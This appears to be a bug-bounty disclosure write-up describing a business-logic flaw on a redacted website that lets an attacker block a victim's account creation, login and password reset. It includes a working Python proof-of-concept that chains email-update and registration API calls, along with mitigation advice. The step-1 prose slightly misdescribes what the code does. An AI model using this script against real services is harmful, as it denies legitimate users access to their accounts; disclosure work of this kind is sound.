Unauthorized Email Address Change Blocks User Account Access — $200

Greetings to the vigilant online community,

Today, I am excited to share my journey of discovery, where I unveiled a critical security vulnerability on the Redacted website. This story showcases the power of responsible disclosure and how I came across an issue that could potentially affect users’ accounts.

The vulnerability I uncovered allows malevolent actors to prevent legitimate users from creating an account, logging in, or resetting their passwords. It involves a lapse in business logic, enabling attackers to manipulate the system to obstruct legitimate users from accessing their own accounts.

Let’s break down how this vulnerability operates:

1. Attacker Updates Victim’s Email Address: The attacker uses an API endpoint to change a victim’s email address to their own, using the victim’s known email address.
2. Attacker Attempts to Create Victim’s Account: The attacker initiates an account creation process using the victim’s email address, which was altered in step 1. The (Private Program) system fails to create the user’s profile, detecting a conflicting email address.
3. Attacker Reverts Their Own Email Address: To avoid locking themselves out, the attacker restores their own email address using a similar API request as in step 1, with their own email address.

For a visual understanding, here's a Proof-of-Concept (POC) code snippet:

import requests
import json

auth_token='authentication_token from cookie' #attacker auth token
remember_token= auth_token

#attacker id (personId)
attacker_id='attacker personal profile id (personId)'  

#attacker email
attacker_email='attacker email'

def update_email(email):
    url = f"https://www.redacted.com/api/v3/people/{attacker_id}"
    headers = {
        "Host": "www.redacted.com",
        "Cookie": f"authentication_token={auth_token}; remember_token={remember_token}",
        "Content-Length": "70",
    }
    data = {
        "person": {
            "email": email,
            "profile": {"customer": {}}
        }
    }
    response = requests.put(url, headers=headers, json=data)
    return response

def create_account(email):
    url = "https://www.redacted.com/register/"
    headers = {
        "Host": "www.redacted.com",
        "Content-Type": "application/json",
        "Content-Length": "113",
    }
    data = {
        "returnPerson": True,
        "first": email,
        "last": email,
        "password": email,
        "email": email
    }
    response = requests.post(url, headers=headers, json=data)
    return response

email = input("Enter an email address: ")

update_email(email)

create_account(email)

update_email(attacker_email)

print("===============================================")
print("Now User Can't Create Or Login Into His Account")
print("===============================================")

The Impact

The repercussions of this vulnerability are significant:

• Blocking Victim’s Account: The victim is effectively locked out of their own account, with the attacker altering their email address and preventing the creation of their user profile.
• Inability to Create an Account: Legitimate users cannot create a new account using their email address, as the system recognizes the email as already in use.
• Preventing Sign-In: Legitimate users cannot sign in, as their user profile was not successfully created.
• Disabling Password Reset: Even if a victim attempts to reset their password, it won’t work as their email address is no longer associated with a valid user profile.

Recommendations for Mitigation

To mitigate this vulnerability and prevent similar incidents in the future, I recommend the following actions:

• Strengthen business logic to ensure user profiles are created only for successfully registered users.
• Implement stronger email address validation and authorization checks when updating email addresses.
• Add additional security layers for account creation and password reset processes.
• Implement mechanisms to prevent attackers from changing legitimate users’ email addresses.
• Provide proper monitoring and alerting systems for suspicious activities on user accounts.

Responsible Disclosure

As responsible security researchers, it is our duty to report such vulnerabilities to the relevant parties. I promptly reported this critical security flaw to the Private Program team through HackerOne, a platform that facilitates responsible disclosure. In recognition of my efforts, I was awarded a $200 bounty.

Let’s keep the internet secure, one discovery at a time!